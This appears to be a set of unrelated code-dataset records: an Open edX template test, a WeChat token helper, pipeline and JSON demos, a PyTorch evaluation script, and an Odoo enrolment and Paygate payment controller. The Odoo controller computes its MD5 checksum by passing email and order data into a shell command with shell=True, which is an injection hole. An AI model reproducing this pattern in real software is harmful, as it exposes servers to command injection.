with Open edX.\"\"\"\n\nfrom django.shortcuts import render\nfrom django.test import RequestFactory, TestCase\n\n\n# We don't enforce arguments documentation in tests\n# pylint: disable=missing-param-doc,missing-type-doc,unused-argument\n\n\nclass VideoLTITemplatesTestCase(TestCase):\n \"\"\"Test the LTI provider endpoint to upload and view videos.\"\"\"\n\n def test_lti_video_launch_request_render_context(self):\n \"\"\"The context should be rendered to html on the launch request page.\"\"\"\n request = RequestFactory().get(\"/\")\n\n video = {\"a\": 1, \"b\": 2}\n response = render(\n request,\n \"core/lti_video.html\",\n {\n \"video\": video,\n \"state\": \"s\",\n \"resource_link_id\": \"rli\",\n \"jwt_token\": \"jwt\",\n },\n )\n self.assertContains(\n response,\n (\n '
    '\n ),\n html=True,\n )\n self.assertContains(\n response,\n '
    ',\n html=True,\n )\n","sub_path":"marsha/core/tests/test_templates_lti_video.py","file_name":"test_templates_lti_video.py","file_ext":"py","file_size_in_byte":1276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"651178654","text":"# -*- coding: utf-8 -*-\n\nimport time\n\nfrom pywe_exception import WeChatException\n\nfrom .basetoken import BaseToken\n\n\nclass Token(BaseToken):\n def __init__(self, appid=None, secret=None, storage=None, token_fetched_func=None, refresh_left_seconds=6600):\n super(Token, self).__init__(appid=appid, secret=secret, storage=storage, token_fetched_func=token_fetched_func, refresh_left_seconds=refresh_left_seconds)\n # 获取access token, Refer: https://mp.weixin.qq.com/wiki?t=resource/res_main&id=mp1421140183\n # 每日实时调用量:100000(次)\n # 如果10分钟刷新一次,则每日预计刷新次数,24 * 60 / 10 = 144\n self.WECHAT_ACCESS_TOKEN = self.API_DOMAIN + '/cgi-bin/token?grant_type=client_credential&appid={appid}&secret={secret}'\n\n def __about_to_expires(self, expires_at, refresh_left_seconds=6600):\n return expires_at and expires_at - int(time.time()) < refresh_left_seconds\n\n def __fetch_access_token(self, appid=None, secret=None, storage=None, token_fetched_func=None, refresh_left_seconds=6600):\n # Update Params\n self.update_params(appid=appid, secret=secret, storage=storage, token_fetched_func=token_fetched_func, refresh_left_seconds=refresh_left_seconds)\n # Access Info Request\n access_info = self.get(self.WECHAT_ACCESS_TOKEN, appid=self.appid, secret=self.secret)\n # Request Error\n if 'expires_in' not in access_info:\n raise WeChatException(access_info)\n # Set Access Info into Storage\n expires_in = access_info.get('expires_in')\n access_info['expires_at'] = int(time.time()) + expires_in\n self.storage.set(self.access_info_key, access_info, expires_in)\n # If token_fetched_func, Call it with `appid`, `secret`, `access_info`\n if token_fetched_func:\n token_fetched_func(self.appid, self.secret, access_info)\n # Return Access Token\n return access_info.get('access_token')\n\n def access_token(self, appid=None, secret=None, storage=None, token_fetched_func=None, refresh_left_seconds=6600):\n # Update Params\n self.update_params(appid=appid, secret=secret, storage=storage, token_fetched_func=token_fetched_func, refresh_left_seconds=refresh_left_seconds)\n # Fetch access_info\n access_info = self.storage.get(self.access_info_key)\n if access_info:\n access_token = access_info.get('access_token')\n if access_token and not self.__about_to_expires(access_info.get('expires_at'), refresh_left_seconds=refresh_left_seconds):\n return access_token\n return self.__fetch_access_token(self.appid, self.secret, self.storage, token_fetched_func=self.token_fetched_func, refresh_left_seconds=refresh_left_seconds)\n\n def refresh_access_token(self, appid=None, secret=None, storage=None, token_fetched_func=None, refresh_left_seconds=6600):\n return self.__fetch_access_token(appid, secret, storage, token_fetched_func=token_fetched_func, refresh_left_seconds=refresh_left_seconds)\n\n def final_access_token(self, cls=None, appid=None, secret=None, token=None, storage=None, token_fetched_func=None, refresh_left_seconds=6600):\n return token or self.access_token(appid or cls.appid, secret or cls.secret, storage=storage or cls.storage, token_fetched_func=token_fetched_func or cls.token_fetched_func, refresh_left_seconds=refresh_left_seconds or cls.refresh_left_seconds)\n\n\ntoken = Token()\naccess_token = token.access_token\nrefresh_access_token = token.refresh_access_token\nfinal_access_token = token.final_access_token\n","sub_path":"pywe_token/token.py","file_name":"token.py","file_ext":"py","file_size_in_byte":3607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"301705375","text":"# -*- coding: utf-8 -*-\n\"\"\"\nTencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community Edition) available.\nCopyright (C) 2017-2019 THL A29 Limited, a Tencent company. All rights reserved.\nLicensed under the MIT License (the \"License\"); you may not use this file except in compliance with the License. You may obtain a copy of the License at\nhttp://opensource.org/licenses/MIT\nUnless required by applicable law or agreed to in writing, software distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.\n\"\"\" # noqa\nfrom pipeline.service.pipeline_engine_adapter.adapter_api import run_pipeline\nfrom pipeline.parser.pipeline_parser import PipelineParser, WebPipelineAdapter\nfrom pipeline.utils.uniqid import uniqid, node_uniqid\nfrom .new_data_for_test import (\n PIPELINE_DATA,\n WEB_PIPELINE_WITH_SUB_PROCESS2\n)\n\n\ndef test_run_serial_pipeline():\n pipeline = PIPELINE_DATA\n parser_obj = PipelineParser(pipeline)\n run_pipeline(parser_obj.parser())\n\n\ndef test_run_sub_pipeline2():\n pipeline = WEB_PIPELINE_WITH_SUB_PROCESS2\n parser_obj = WebPipelineAdapter(pipeline)\n run_pipeline(parser_obj.parser())\n\n\ndef main_test():\n id_list = [node_uniqid() for i in xrange(100)]\n pipe1 = {\n 'id': id_list[0],\n 'name': 'name',\n 'start_event': {\n 'id': id_list[1],\n 'name': 'start',\n 'type': 'EmptyStartEvent',\n 'incoming': None,\n 'outgoing': id_list[2]\n },\n 'end_event': {\n 'id': id_list[53],\n 'name': 'end',\n 'type': 'EmptyEndEvent',\n 'incoming': id_list[52],\n 'outgoing': None\n },\n 'activities': {\n },\n 'flows': { # 存放该 Pipeline 中所有的线\n },\n 'gateways': { # 这里存放着网关的详细信息\n },\n 'data': {\n 'inputs': {\n },\n 'outputs': {\n },\n }\n }\n for i in xrange(2, 51, 2):\n pipe1['flows'][id_list[i]] = {\n 'id': id_list[i],\n 'source': id_list[i - 1],\n 'target': id_list[i + 1]\n }\n pipe1['activities'][id_list[i + 1]] = {\n 'id': id_list[i + 1],\n 'type': 'ServiceActivity',\n 'name': 'first_task',\n 'incoming': id_list[i],\n 'outgoing': id_list[i + 2],\n 'component': {\n 'code': 'demo',\n 'inputs': {\n 'input_test': {\n 'type': 'plain',\n 'value': '2',\n },\n 'radio_test': {\n 'type': 'plain',\n 'value': '1',\n },\n },\n }\n }\n pipe1['flows'][id_list[52]] = {\n 'id': id_list[52],\n 'source': id_list[52 - 1],\n 'target': id_list[52 + 1]\n }\n parser_obj = PipelineParser(pipe1)\n run_pipeline(parser_obj.parser())\n","sub_path":"pipeline/tests/pipeline_parser/manual_test_run_parsed_pipeline.py","file_name":"manual_test_run_parsed_pipeline.py","file_ext":"py","file_size_in_byte":3219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"142320443","text":"\"\"\"\n读写JSON文件\n@Date 2020.04.11\n\"\"\"\n# JSON模块上主要有四个比较重要的函数,分别是\n# dump - 将Python对象按照JSON格式序列化到文件中\n# dumps - 将Python对象处理成JSON格式的字符串\n# load - 将文件中的JSON数据反序列化成对象\n# loads - 将字符串的内容反序列化成Python对象\nimport json\n\n\ndef main():\n # 定义字典对象\n mydict = {\n 'name': 'zyj',\n 'age': 20,\n 'qq': 1836686674,\n 'friends': ['Yong', 'xin'],\n 'cars': [\n {'brand': '迈巴赫', 'max_speed': '350'},\n {'brand': ' 布加迪威龙', 'max_speed': '430'}\n ]\n }\n try:\n # 将字典对象序列化到文件\n with open('./res/zyj.json', 'w', encoding='utf-8') as fs:\n json.dump(mydict, fs)\n except IOError as e:\n print(e)\n print('保存数据完成!')\n\n try:\n # 从文件中读入,反序列化成对象\n with open('./res/zyj.json', 'r', encoding='utf-8') as fs:\n mydict = json.load(fs)\n print(mydict)\n\n except FileNotFoundError as e:\n print(e)\n except IOError as e:\n print(e)\n print('保存数据完成!')\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"基本语法/Day17/读写json文件.py","file_name":"读写json文件.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"124697134","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Nov 4 19:46:38 2020\n\n@author: Jonathan\n\"\"\"\n\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Nov 1 09:11:23 2020\n\n@author: Jonathan\n\"\"\"\nimport numpy as np\nimport torch\nimport pandas as pd\nfrom torch import nn, optim\n#import torch.nn.functional as F\nfrom torch.utils.data import DataLoader,TensorDataset\n#from torch.utils.data.dataset import Dataset\n#from torchvision import transforms\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import confusion_matrix\nimport seaborn as sns\n\nbatchSize=100 \nepochNum=1\nlearningRate = 0.001 \n\nfile= open(\"result.txt\", \"a+\")\n#class MyDataSet(Dataset):\n# def __init__(self, data,labels,transform=None,targetTransform=None):\n# self.data = data\n# self.labels=labels\n# self.transform = transform\n# \n# def __len__(self):\n# return len(self.data)\n# \n# def __getitem__(self,index):\n# if torch.is_tensor(index):\n# index = index.tolist()\n# data=self.data[index]\n# labels=self.labels[index]\n# if self.transform is not None:\n# data = self.transform(data)\n# if self.targetTransform is not None:\n# labels = self.transform(labels)\n# return data, labels\n\n\ntrainData=pd.read_csv('trainData.csv')\ntarget = trainData['class']\ndel trainData['class']\ntrainSet = TensorDataset(torch.Tensor(np.array(trainData)), torch.Tensor(np.array(target)))\n\ntestData=pd.read_csv('testData.csv')\ntarget = testData['class']\ndel testData['class']\ntestSet = TensorDataset(torch.Tensor(np.array(testData)), torch.Tensor(np.array(target)))\n#trainSet=MyDataSet(trainData.drop('class', axis=1),trainData['class'])\n#testSet=MyDataSet(testData.drop('class', axis=1),testData['class'])\n\ntrainLoader = DataLoader(trainSet, batch_size=batchSize, shuffle=True)\ntestLoader = DataLoader(testSet, batch_size=batchSize, shuffle=False)\n\n\n\n#class Cnn(nn.Module):\n# def __init__(self,inDim,outDim):\n# super(Cnn,self).__init__()\n# self.conv1 = nn.Conv2d(inDim, 6, 5, 1, 2)\n# self.pool = nn.MaxPool2d(2, 2)\n# self.conv2 = nn.Conv2d(6, 16, 5, 1, 0)\n# self.fc1 = nn.Linear(400, 120)\n# self.fc2 = nn.Linear(120, 84)\n# self.fc3 = nn.Linear(84, outDim)\n#\n# def forward(self, x):\n# x = self.pool(F.relu(self.conv1(x)))\n# x = self.pool(F.relu(self.conv2(x)))\n# x = x.view(-1, 16 * 5 * 5)\n# x = F.relu(self.fc1(x))\n# x = F.relu(self.fc2(x))\n# x = self.fc3(x)\n# return x\nclass Cnn(nn.Module):\n def __init__(self, inDim, outDim):\n super(Cnn, self).__init__()\n self.conv = nn.Sequential(\n nn.Conv2d(inDim, 24, 3, stride=1, padding=2),\n nn.BatchNorm2d(24),\n nn.ReLU(True),\n nn.MaxPool2d(2, 2),\n nn.Conv2d(24, 48, 3, stride=1, padding=0),\n nn.BatchNorm2d(48),\n nn.ReLU(True), \n nn.MaxPool2d(2, 2),\n nn.Dropout(0.5)\n )\n\n self.fc = nn.Sequential(\n nn.Linear(1728,outDim))\n\n def forward(self, x):\n out = self.conv(x)\n out = out.view(out.size(0), -1)\n out = self.fc(out)\n return out\n\n\n\nDEVICE='cuda' if torch.cuda.is_available() else 'cpu'\n\nmodel=torch.load('model_24_48_0.6_2')\nmodel=model.to(DEVICE)\n\noptimizer = optim.Adam(params=model.parameters(),betas=(0.9, 0.999), lr=learningRate)\ncriterion = nn.CrossEntropyLoss()\n\nlossMin=1\ntrainLossPlot=[]\ntrainAccPlot=[]\nlossPlot=[]\naccPlot=[]\n\nfor epoch in range(epochNum):\n model.train()\n runningLoss = 0.0\n runningAcc=0.0\n print('epoch {}'.format(epoch + 1))\n print('=' * 10)\n# \n# for data in trainLoader:\n# # get the inputs; data is a list of [inputs, labels]\n# inputs, labels = data\n# labels=labels.long()\n# inputs=inputs.view(batchSize,1,28,28)\n# inputs=inputs.to(DEVICE)\n# labels=labels.to(DEVICE)\n#\n# # zero the parameter gradients\n# optimizer.zero_grad()\n#\n# # forward + backward + optimize\n# outputs = model(inputs)\n# loss = criterion(outputs, labels)\n# loss.backward()\n# optimizer.step()\n#\n# # print statistics\n# runningLoss += loss.item()\n# \n# _, pred = torch.max(outputs, 1)\n# numCorrect = (pred == labels).sum()\n# runningAcc += numCorrect.item()\n# \n# runningLoss=runningLoss/len(trainLoader)\n# runningAcc=runningAcc/len(trainData)\n# trainLossPlot.append(runningLoss)\n# trainAccPlot.append(runningAcc)\n# print('Finish {} epoch, Loss: {:.6f}, Acc: {:.6f}'.format(epoch + 1, runningLoss,runningAcc))\n \n model.eval()\n evalLoss = 0\n evalAcc = 0\n cmPred=[]\n cmLabel=[]\n for data in testLoader:\n inputs, labels = data\n labels=labels.long()\n inputs=inputs.view(batchSize,1,28,28)\n inputs=inputs.to(DEVICE)\n labels=labels.to(DEVICE)\n \n outputs = model(inputs)\n loss = criterion(outputs, labels)\n \n evalLoss += loss.item()\n _, pred = torch.max(outputs, 1)\n \n temp=(pred.cpu().detach().numpy())\n cmPred=np.append(cmPred,temp)\n temp=(labels.cpu().detach().numpy())\n cmLabel=np.append(cmLabel,temp)\n \n numCorrect = (pred == labels).sum()\n evalAcc += numCorrect.item()\n \n evalAcc=evalAcc/len(testData)\n evalLoss=evalLoss/len(testLoader)\n lossPlot.append(evalLoss)\n accPlot.append(evalAcc)\n print('Eval Loss: {:.6f}, Acc: {:.6f}'.format(evalLoss,evalAcc))\n \n cm=confusion_matrix(cmPred, cmLabel)\n ax= plt.subplot()\n sns.heatmap(cm, annot=True, fmt='.20g', ax = ax)\n ax.set_xlabel('True labels');ax.set_ylabel('Predicted labels'); \n ax.set_title('Confusion Matrix'); \n plt.show()\n# if evalLoss<=lossMin:\n# lossMin=evalLoss\n# lossMinEpoch=epoch\n# elif epoch-lossMinEpoch>20:\n# break;\n# if evalLoss<=lossMin:\n# lossMin=evalLoss\n# else:\n# break\n#torch.save(model,'model_32_64_0.5_1')\n\n#outputData=pd.DataFrame(index=['lossPlot','accPlot','trainLossPlot','trainAccPlot'],data=[lossPlot,accPlot,trainLossPlot,trainAccPlot])\n#outputData.to_csv('data_16_32_100_std_drop0.8.csv', mode='a', header=False) \n#print (lossMin)\n#plt.plot (np.asarray(lossPlot),label='test loss')\n#plt.xlabel('epoch')\n#plt.ylabel('loss')\n#\n#plt.plot (np.asarray(trainLossPlot),label='Train loss')\n#plt.legend()\n#print ('Batch size=',batchSize)\n#print ('lr=',learningRate) \nfile.close()","sub_path":"project 1/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":6522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"392381243","text":"# -*- coding: utf-8 -*-\nimport base64\n\nimport werkzeug\nimport logging\nfrom odoo import SUPERUSER_ID\nfrom odoo import http\nfrom odoo.http import request\nfrom datetime import datetime, time, date\nimport json\nimport requests\nimport hashlib\nimport pycountry\nimport subprocess\nimport re\n\n\nclass OnlineEnrolment(http.Controller):\n global_vals = {}\n\n @http.route(['/enrolment', '/enrolment/home'], type='http', auth=\"public\", website=True)\n def enrolment_home(self, **post):\n self.global_vals = {}\n return request.render('swgc_enrolment.enrolment_home', {'global_vals': self.global_vals})\n\n @http.route(['/enrolment/welcome_career'], type='http', auth=\"public\", website=True)\n def enrolment_welcome_career(self, **post):\n return request.render('swgc_enrolment.enrolment_welcome_career')\n\n @http.route(['/enrolment/student_status'], type='http', auth=\"public\", methods=['POST', 'GET'], website=True,\n csrf=False)\n def student_status(self, **post):\n if request.httprequest.method == 'POST':\n vals = {}\n vals['student_status'] = request.httprequest.form.get('student_status')\n\n self.global_vals['student_status'] = post.get('student_status')\n request.session['global_vals'] = self.global_vals\n return request.redirect('/enrolment/registration')\n student_ids = request.env['res.partner'].search([])\n students = student_ids.read(['student_no'])\n student_numbers = []\n for student in students:\n st_no = str(student['student_no'])\n if st_no:\n student_numbers.append(st_no)\n return request.render('swgc_enrolment.enrolment_student_status',\n {'global_vals': self.global_vals, 'student_numbers': student_numbers})\n\n @http.route(['/enrolment/registration'], type='http', auth=\"public\", website=True, csrf=False)\n def registraion(self, **post):\n self.global_vals = request.session['global_vals']\n enrolment = False\n if post:\n orm_partner = request.env['res.partner']\n enrolment_pool = request.env['enrolment.enrolment']\n partner_id = orm_partner.search([('email', '=ilike', post.get('email'))])\n if not partner_id:\n stu_post = post\n stu_post.update({'name': post.get('first_name') + ' ' + post.get('last_name'), 'student': True})\n post['student_id'] = orm_partner.create(stu_post).id\n else:\n post['student_id'] = partner_id.id\n global_vals = self.global_vals\n campus = request.env['res.partner'].sudo().search_read([('name', 'ilike', 'TECHNISA CAMPUS')], limit=1)\n global_vals['student_id'] = post['student_id']\n global_vals['campus'] = campus[0] if campus else ''\n request.session['global_vals'] = self.global_vals\n post['student_status'] = global_vals['student_status']\n post['campus_id'] = campus[0].get('id') or False\n post.update({'online_enrol': True, 'campus': campus[0].get('id') or ''})\n if not request.session.get('enrolment_id'):\n enrolment_id = enrolment_pool.create(post)\n request.session['enrolment_id'] = enrolment_id.id\n request.session['enrolment_obj'] = enrolment_id.read([])\n return request.redirect('/enrolment/division')\n country = request.env['res.country']\n state = request.env['res.country.state']\n ethnic = request.env['student.ethnic']\n disability = request.env['student.disability']\n title = request.env['res.partner.title']\n\n country_ids = country.search([])\n country_list = country.browse(country_ids.ids)\n\n state_ids = state.search([])\n state_read = state_ids.read(['name', 'country_id'])\n state_list = state.browse(state_ids.ids)\n\n ethnic_ids = ethnic.search([])\n ethnic_list = ethnic.browse(ethnic_ids.ids)\n\n disability_ids = disability.search([])\n disability_list = disability.browse(disability_ids.ids)\n\n title_ids = title.search([])\n title_list = title.browse(title_ids.ids)\n\n return request.render('swgc_enrolment.enrolment_registration',\n {'enrolment': enrolment, 'country_list': country_list, 'state_list': state_list,\n 'ethnic_list': ethnic_list, 'disability_list': disability_list,\n 'title_list': title_list, 'global_vals': self.global_vals})\n\n # @http.route(['/enrolment/campus'], type='http', auth=\"public\", website=True)\n # def campus(self, **post):\n # self.global_vals = request.session['global_vals']\n # campus = request.env['res.partner']\n # if request.httprequest.method == 'POST':\n # campus_id = post.get('campus') and int(post.get('campus'))\n # campus_id = campus.browse([campus_id])\n # self.global_vals['campus'] = campus_id.read()[0]\n # request.session['global_vals'] = self.global_vals\n # enrolment_id = request.session['enrolment_id']\n # request.env['enrolment.enrolment'].browse([enrolment_id]).write({'campus': campus_id.id})\n # # return request.redirect('/enrolment/division')\n # return request.redirect('/enrolment/qualification')\n # campus_ids = campus.search([('campus', '=', 'True'), ('view_type', '=', 'campus')])\n #\n # return request.render('swgc_enrolment.enrolment_campus',\n # {'campuses': campus_ids, 'global_vals': self.global_vals})\n\n @http.route(['/enrolment/division'], type='http', auth=\"public\", website=True)\n def division(self, **post):\n self.global_vals = request.session['global_vals']\n division = request.env['division'].sudo()\n if request.httprequest.method == 'POST':\n division_id = post.get('division_id') and int(post.get('division_id'))\n enrolment_id = request.session['enrolment_id']\n enrolment_id = request.env['enrolment.enrolment'].browse([enrolment_id])\n enrolment_id.write({'division_id': division_id})\n division_id = request.env['division'].browse([division_id])\n self.global_vals['division_id'] = division_id.read()[0]\n request.session['global_vals'] = self.global_vals\n return request.redirect('/enrolment/qualification')\n quals = []\n if self.global_vals['campus']:\n qual_ids = request.env['course.programme'].search([])\n campus_id = self.global_vals['campus']['id']\n for obj in qual_ids:\n if campus_id in obj.campus_ids.ids:\n quals.append(obj.division_id)\n quals = set(quals)\n division_ids = division.search([])\n return request.render('swgc_enrolment.enrolment_division',\n {'divisions': division_ids, 'quals': quals, 'global_vals': self.global_vals})\n\n @http.route(['/enrolment/qualification'], type='http', auth=\"public\", website=True)\n def qualification(self, **post):\n self.global_vals = request.session['global_vals']\n course_programme = request.env['course.programme']\n if request.httprequest.method == 'POST':\n programme_id = request.httprequest.form.get('course_programme') and int(\n request.httprequest.form.get('course_programme')) or False\n enrolment_id = request.session['enrolment_id']\n course_programme = request.env['course.programme'].browse([programme_id])\n enrolment_id = request.env['enrolment.enrolment'].browse([enrolment_id])\n enrolment_id.write({'course_programme': programme_id, 'level_id': course_programme.course_level_id.id})\n self.global_vals['level_id'] = course_programme.course_level_id.read()[0]\n self.global_vals['course_programme'] = course_programme.read()[0]\n request.session['global_vals'] = self.global_vals\n return request.redirect('/enrolment/subjects')\n campus_id = self.global_vals.get('campus')['id']\n programme_ids = course_programme.search([('active', '=', True), ('online_enrolment', '=', True)])\n self.global_vals['programme_ids'] = programme_ids.ids\n request.session['global_vals'] = self.global_vals\n return request.render('swgc_enrolment.enrolment_qualification',\n {'programmes': programme_ids.read(), 'global_vals': self.global_vals})\n\n # @http.route(['/enrolment/level'], type='http', auth=\"public\", website=True)\n # def level(self, **post):\n # self.global_vals = request.session['global_vals']\n # course_level = request.env['course.level']\n # if request.httprequest.method == 'POST':\n # level_id = post.get('level_id') and int(post.get('level_id'))\n # enrolment_id = request.session['enrolment_id']\n # enrolment_id = request.env['enrolment.enrolment'].browse([enrolment_id])\n # enrolment_id.write({'level_id': level_id})\n # level_id = course_level.browse([level_id])\n # self.global_vals['level_id'] = level_id.read()[0]\n # request.session['global_vals'] = self.global_vals\n # return request.redirect('/enrolment/subjects')\n # level_ids = course_level.search([])\n # return request.render('swgc_enrolment.enrolment_course_level',\n # {'levels': level_ids.read(), 'global_vals': self.global_vals})\n\n @http.route(['/enrolment/subjects'], type='http', auth=\"public\", website=True)\n def subjects(self, **post):\n self.global_vals = request.session['global_vals']\n if request.httprequest.method == 'POST':\n product_ids = []\n if request.httprequest.form:\n product_ids.extend([int(key) for key in post.keys()])\n self.global_vals['product_ids'] = product_ids\n self.global_vals['subject_names'] = request.env['product.product'].browse(product_ids).read()\n enrolment_id = request.session['enrolment_id']\n request.env['enrolment.enrolment'].browse([enrolment_id]).write({'subject_ids': [(6, 0, product_ids)]})\n request.session['global_vals'] = self.global_vals\n return request.redirect('/enrolment/semester')\n programme_ids = request.env['enrolment.enrolment'].browse([request.session['enrolment_id']])\n compulsory_subjects, optional_subjects = None, None\n for programme in programme_ids.course_programme:\n compulsory_subjects = programme.compulsory_subject_lines\n compulsory_subjects = [subject for subject in compulsory_subjects]\n optional_subjects = programme.optional_subject_lines\n optional_subjects = [subject for subject in optional_subjects if\n subject.course_level.id == self.global_vals['level_id']['id']]\n return request.render('swgc_enrolment.enrolment_subjects', {'compulsory_subjects': compulsory_subjects,\n 'optional_subjects': optional_subjects,\n 'global_vals': self.global_vals})\n\n @http.route(['/enrolment/semester'], type='http', auth=\"public\", website=True)\n def semester(self, **post):\n self.global_vals = request.session['global_vals']\n if post:\n semester_id = post.get('semester_id') and int(post.get('semester_id')) or False\n self.global_vals['semester_id'] = request.env['semester'].browse([semester_id]).read()[0]\n year_id = post.get('year_id') and int(post.get('year_id')) or False\n self.global_vals['year_id'] = request.env['course.year'].browse([year_id]).read()[0]\n request.session['global_vals'] = self.global_vals\n\n global_vals = self.global_vals\n orm_partner = request.env['res.partner']\n orm_sale = request.env['sale.order']\n partner = orm_partner.browse(global_vals['student_id'])\n post['student_status'] = global_vals['student_status']\n post['campus'] = global_vals['campus']['id']\n post['division_id'] = global_vals['division_id']['id']\n post['course_programme'] = global_vals['course_programme']['id']\n post['subject_ids'] = [(6, 0, global_vals['product_ids'])]\n post['level_id'] = global_vals['level_id']['id']\n post['year_id'] = global_vals['year_id']['id']\n post['semester_id'] = global_vals['semester_id']['id']\n post['mobile'] = str(partner.mobile)\n\n enrolment_id = request.session.get('enrolment_id')\n enrolment = request.env['enrolment.enrolment'].browse(enrolment_id)\n enrolment.write({'year_id': post.get('year_id'),\n 'semester_id': post.get('semester_id')})\n\n if partner:\n partner.write({'year_id': post.get('year_id'),\n 'semester_id': post.get('semester_id')})\n\n sale_order_vals = {\n 'partner_id': global_vals['student_id'],\n 'state': 'draft',\n 'partner_invoice_id': global_vals['student_id'],\n 'partner_shipping_id': global_vals['student_id'],\n 'picking_policy': 'direct',\n 'order_policy': 'manual',\n 'pricelist_id': 1,\n }\n sale_order_id = orm_sale.create(sale_order_vals)\n quote_name = \"SO{0}ENR\".format(str(sale_order_id.id).zfill(3))\n order_line_vals = [(0, 0, {'product_id': product.id, 'name': product.name, 'product_uom_qty': 1,\n 'price_unit': product.lst_price, 'tax_id': [(6, 0, product.taxes_id.ids)],\n 'order_id': sale_order_id.id}) for product in enrolment.subject_ids]\n request.session['sale_order_id'] = sale_order_id.id\n sale_order_id.write({'name': quote_name, 'order_line': order_line_vals})\n request.session['global_vals'] = self.global_vals\n return request.redirect('/enrolment/payment')\n course_year = request.env['course.year']\n semester = request.env['semester']\n current_year = datetime.now().year\n year_ids = course_year.search([('name', 'in', [str(current_year), str(current_year + 1)])])\n semester_ids = semester.search([])\n return request.render('swgc_enrolment.enrolment_semester',\n {'year_list': year_ids, 'semester_list': semester_ids,\n 'global_vals': self.global_vals})\n\n @http.route(['/enrolment/payment'], type='http', auth=\"public\", website=True, csrf=False)\n def payment(self, **post):\n if post:\n return request.redirect('/enrolment/registration_details')\n orm_sale = request.env['sale.order']\n sale_order_id = request.session.get('sale_order_id')\n sale_order = False\n total = 0.0\n if sale_order_id:\n sale_order = orm_sale.browse([sale_order_id])\n total = sale_order.amount_total\n enrolment_id = request.session['enrolment_id']\n enrolment = request.env['enrolment.enrolment'].browse([enrolment_id])\n self.global_vals = request.session['global_vals']\n query_response = request.session.get('paygate_trasn_response')\n response_error = False\n if query_response:\n response_error = query_response.get('RESULT_DESC')\n request.session['paygate_trasn_response'] = False\n\n acquirer_id = request.env['payment.acquirer'].sudo().search([('provider', '=', 'paygate')], limit=1)\n url = acquirer_id.paygate_url + '/initiate.trans'\n country_code = str(sale_order.partner_id.country_id.code)\n if country_code:\n try:\n country = pycountry.countries.get(alpha2=country_code.upper()).alpha3.encode('ascii', 'ignore')\n except Exception as e:\n country = pycountry.countries.get(alpha_2=country_code.upper()).alpha_3.encode('ascii', 'ignore')\n else:\n country = 'ZAF'\n currency = sale_order.currency_id.name\n ref = sale_order.name\n amount = int(float(sale_order.amount_total) * 100)\n email = sale_order.partner_id.email\n values = {\n 'PAYGATE_ID': acquirer_id.paygate_id,\n 'REFERENCE': ref,\n 'AMOUNT': amount,\n 'CURRENCY': currency,\n 'RETURN_URL': '%senrolment/payment_success_paygate' % (http.request.httprequest.host_url),\n 'TRANSACTION_DATE': str(datetime.now().date()),\n 'LOCALE': 'en',\n 'COUNTRY': country,\n 'EMAIL': email,\n }\n checksum = \"%s%s%s%s%s%s%s%s%s%s\" % (\n acquirer_id.paygate_id, ref, str(amount), currency,\n '%senrolment/payment_success_paygate' % (http.request.httprequest.host_url),\n str(datetime.now().date()), 'en',\n country.decode(\"utf-8\"), email, acquirer_id.paygate_key)\n checksum = subprocess.check_output(\"echo -n %s | md5sum\" % checksum, shell=True)\n checksum = (checksum.decode(\"utf-8\")).split(\"-\")[0].strip()\n values.update({\n 'CHECKSUM': checksum\n })\n sale_order = request.env['sale.order'].sudo().search(\n [('name', '=', ref)])\n init_tras = requests.post(url=url, data=values)\n response = dict(x.split('=') for x in init_tras.text.split('&'))\n request.session['paygate_response'] = response\n values = {'global_vals': self.global_vals, 'sale_order': sale_order, 'total': total,\n 'enrolment': enrolment, 'response': response_error}\n if response.get('PAY_REQUEST_ID'):\n values.update({\n 'pay_request_id': response.get('PAY_REQUEST_ID'),\n 'checksum': response.get('CHECKSUM'),\n 'ref': ref,\n 'amount': amount,\n 'url': acquirer_id.paygate_url + '/process.trans'\n })\n return request.render('swgc_enrolment.paygate_com', values)\n\n @http.route('/enrolment/payment_success_paygate', type='http', auth='none', website=True, csrf=False)\n def response_back_paygate(self, **post):\n response = request.session.get('paygate_response')\n acquirer_id = request.env['payment.acquirer'].sudo().search([('provider', '=', 'paygate')], limit=1)\n url = acquirer_id.paygate_url + '/query.trans'\n data = {\n 'PAYGATE_ID': response.get('PAYGATE_ID'),\n 'PAY_REQUEST_ID': post.get('PAY_REQUEST_ID'),\n 'REFERENCE': response.get('REFERENCE'),\n 'CHECKSUM': response.get('CHECKSUM')\n }\n query_tras = requests.post(url=url, data=data)\n query_response = dict(x.split('=') for x in query_tras.text.split('&'))\n sale_order = request.env['sale.order'].sudo().search(\n [('name', '=', response.get('REFERENCE'))])\n data = {\n 'reference': response.get('REFERENCE'),\n 'amount': sale_order.amount_total,\n 'trans_id': query_response.get('TRANSACTION_ID'),\n 'result_code': query_response.get('RESULT_CODE'),\n 'trans_status': query_response.get('TRANSACTION_STATUS')\n }\n if query_response.get('RESULT_CODE') == '990017' and query_response.get('TRANSACTION_STATUS') == '1':\n payment_tx_id = request.env['payment.transaction'].sudo().create({\n 'reference': sale_order.name,\n 'sale_order_ids': [(4, sale_order.id)],\n 'amount': sale_order.amount_total,\n 'currency_id': sale_order.currency_id.id,\n 'acquirer_id': acquirer_id.id,\n 'partner_country_id': sale_order.partner_id.country_id.id,\n 'state': 'draft',\n 'type': 'validation',\n })\n redirect_url = \"/enrolment/payment_success\"\n request.env['payment.transaction'].form_feedback(data, 'paygate')\n self.paygate_autopay(sale_order.name)\n else:\n request.session['paygate_trasn_response'] = query_response\n redirect_url = \"/enrolment/payment\"\n return werkzeug.utils.redirect(redirect_url)\n\n @http.route(['/enrolment/payment_success'], type='http', auth=\"public\", website=True)\n def payment_success(self, **post):\n cr = request.cr\n 